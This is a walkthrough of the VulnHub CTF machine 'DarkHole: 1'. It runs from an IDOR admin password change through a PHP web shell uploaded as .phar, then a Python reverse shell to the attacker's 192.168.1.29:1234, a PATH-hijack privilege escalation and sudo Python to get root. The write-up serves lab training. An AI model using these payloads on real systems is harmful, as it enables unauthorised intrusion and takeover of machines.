Capture the flag (CTF)

DARKHOLE: 1 VulnHub CTF Walkthrough

LetsPen Test
October 25, 2021 by
LetsPen Test

In this article, we will solve a capture the flag challenge ported on the Vulnhub platform. 

As a hint, there is not much use of brute force while solving this CTF. This is a beginner-friendly challenge as the difficulty level is given as easy. Pre-requisites would be having some knowledge of Linux commands and the ability to run some basic pentesting tools.

The torrent downloadable URL is also available for this VM; it has been added in the reference section of this article.

Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

The steps

  1. Getting the IP address with the Netdiscover utility
  2. Port scanning through Nmap
  3. Enumerating running web application and identifying vulnerability
  4. Uploading PHP Shell and taking the reverse connection
  5. Escalating privilege and reading the user flag
  6. Escalating privilege and getting the root shell and flag

The walkthrough

Step 1

The first step is to run the Netdiscover command to identify the target machine's IP address. In the screenshot given below, Netdiscover has given us a list of all the available IP addresses. It can be seen in the following screenshot. [CLICK IMAGES TO ENLARGE]

Command used: << netdiscover >>

In the highlighted area of the above screenshot, we can see an IP address, our target machine IP address. The target machine IP address is 192.168.1.14, and we will be using 192.168.1.29 as the attacker's IP address.

Note: The target machine IP address may be different in your case, as the network DHCP is assigning it.

Step 2

The second step is to run a port scan to identify the open ports and services on the target machine. I prefer to use the Nmap tool for port scanning, as it works effectively and is available on Kali Linux by default. In the highlighted area of the following screenshot, we can see the Nmap command we used to scan the ports on our target machine. The identified open ports can also be seen in the screenshot given below.

Command used: << nmap 192.168.1.14 -sV -p- >>

We used the '-sV' option for version enumeration and '-p-'for full port scan in the Nmap Command. This means we are telling Nmap to conduct the scan in all 65535 ports. By default, Nmap conducts the scan only known 1024 ports. So, it is very important to conduct the full port scan during a Pentest or solving a CTF.

The output of the Nmap shows that two open ports have been identified Open in the full port scan. Port 80 is being used for the HTTP service, and port 22 is being used for the SSH service.

In the next step, we will start the CTF with Port 80.

Step 3

Let's start the CTF by exploring the HTTP port. We opened the target machine IP address on the browser.

In the above screenshot, we can see the target application. There is a login functionality, so let's go to the login page. The login page can be seen below.

Here, we have login as well as registration functionality. So, we clicked on 'signup' to register as a new user on the target application.

We registered as a new user on the target machine, and the request with the provided details can be seen above intercepted in the burp window. Let's use these details to log in to the target application.

We logged into the target application with the username and password as 'infosec.' We analyzed the target application for vulnerabilities and found a few loopholes that can be used to our advantage.

There was password change functionality for the current user with session management flaws. We intercepted the password change request in burp and found that the password change depended on the id parameter.

We changed the current user id value from 3 to the admin user's id, i.e., 1. Through this, we can change the password for the user admin. After that, we logged into the target application as user admin. We started exploring further functionality through the admin user.

We found a file upload functionality in the target application. It was vulnerable to a malicious file upload. We can upload a PHP shell through this and get access to the target machine.

Step 4

On our attacker machine, we crafted a payload in the form of a PHP shell to get the reverse shell from the target machine.

Code: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

The above PHP shell will allow us to execute commands on the target machine through the browser. We saved the file as 'shell.php. Let's upload it on the target application; this can be seen below in the burp window.

As can be seen above, the upload was unsuccessful, as the target application does not accept the 'PHP file extension. So, in the request section, we changed the file extension to 'phar.' This can be seen in the following screenshot.

After that, we sent the request and this time. The target application returned no errors. This means the file has been successfully uploaded. Next, we'll open the uploaded payload 'shell.phar' on the browser.

The file shell.phar can be seen in the above screenshot. We run the 'ls' command through the 'cmd' parameter to check whether we can execute commands on the target machine. The result on the screen shows that the command was successfully executed.

We crafted a python payload to get the reverse proxy of the target machine. We also configured Netcat on our attacker machine for listening to incoming connections through port 1234.

The payload used for this purpose is given below for reference-

Python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We’ll copy-paste the payload into the cmd parameter on the uploaded shell. The result can be seen below.

Command used: << nc -lvp 1234 >>

http://192.168.1.14/upload/shell.phar?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.29%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

After waiting for few seconds, we got the reverse shell access on the netcat terminal. We have the target machine access through which we can explore further.

Step 5

After getting the shell access, we noticed that it was a limited shell. So, we used a python command for getting stable shell access.

Command used: << python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ >>

Let's try to gather information to get the root access of this system. We started with a few enumeration commands and checked each file and directory that we could access through this shell.

Command used:

<< cat /etc/issue >>

<< uname -a >>

<< ls -l >>

At first, we enumerated the target machine operating system and kernel information. We researched the web for an available exploit for the identified versions, but none of them are useful in our case. We found an interesting program file while exploring the target machine, though. It can be seen highlighted in the above screenshot. When we execute the program, it shows the current user information and output of the 'id' command. 

Command used:

<< cd /tmp >>

<< echo “/bin/bash” > id >>

<< chmod +x id >>

<< export PATH=/tmp:$PATH >>

<< which id >>

Since we know that there is a program running from a when we execute this program, it shows the running user, and it is the output of the ID command.

We had to do some research to identify a way to misuse the program's behavior. To do that, we first changed the current directory to '/tmp.' Then, we created a file named 'id' using the echo command. We added the '/bin/bash' script in the file and provided executable permission to the file by using the chmod command. Then we set the path to the tmp folder. We verified that the changes had been set by calling the 'id' path with the help of which command. The output shows the path set by us. This means the changes have been configured successfully.

Let's rerun the program to see the changes. This should help us escalate user privilege.

Command used: << cat user.txt >>

In the above screenshot, we see that we are now logged into the target machine as user' john.' We checked the contents of the current directory, where we found the first flag. The flag file named 'user.txt' can be seen in the above screenshot. There were also other exciting files which we will explore in the next step.

Step 6

In the current user directory, we identified a few files that seem to be interesting. One of the files was named 'password.' We've opened the file, which can be seen below.

Command used:

<< cat password >>

<< sudo -l >>

As we can see above, the password file contained a password' root123.' We also checked the sudo permissions by running the 'sudo –l' command and found that it needed a password to be executed. We provided the identified password, and it showed the output. We found a python file in the user directory that can be run as a root. We can edit this file to our advantage.

Command used:

<< echo ‘import os;os.system(“/bin/bash”)’ > file.py >>

<< sudo /user/bin/python3 /home/john/file.py >>

<< id >>

We used the 'echo' command to edit the 'file.py' shell in the above screenshot. We added the '/bin/bash/ script in the file contents. Then, we executed the file to get the root access of the target machine. This was verified by running the 'id' command, which confirms that we are now root on the target machine.

Command used: << cat root.txt >>

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

To complete the challenge, we found the root flag, which was in the same directory. The root flag can be seen in the above screenshot.

We have solved the CTF by reading two flags and getting root access to the target machine.

 

Sources

Darkhole, Vulnhub

Darkhole, Vulnhub

Darkhole, Vulnhub

LetsPen Test
LetsPen Test